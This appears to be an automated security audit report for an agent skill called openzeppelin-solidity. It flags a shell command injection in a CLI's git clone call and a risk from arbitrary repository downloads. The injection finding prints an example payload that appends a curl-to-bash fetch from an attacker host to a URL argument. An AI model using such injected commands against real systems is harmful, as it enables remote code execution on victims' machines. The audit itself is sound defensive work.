openzeppelin-solidity

Fail

Audited by Gen Agent Trust Hub on Mar 4, 2026

Risk Level: HIGHCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
  • [COMMAND_EXECUTION]: The bin/cli.js script is vulnerable to shell command injection in the addFromRemote function. It uses child_process.execSync to run a git clone command using a URL provided as a command-line argument. While some basic regex validation is applied to short-hand GitHub paths, any argument starting with https:// or http:// is passed directly to the shell unsanitized. An attacker could exploit this by providing a payload such as https://github.com/user/repo; curl http://attacker.com/script | bash.
  • [EXTERNAL_DOWNLOADS]: The skill's CLI tool facilitates the downloading of external content from arbitrary GitHub repositories into the user's local workspace. While intended to allow users to pull in updated or community rules, it creates a vector for downloading and executing untrusted configuration files if the source repository is malicious.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Mar 4, 2026, 03:20 PM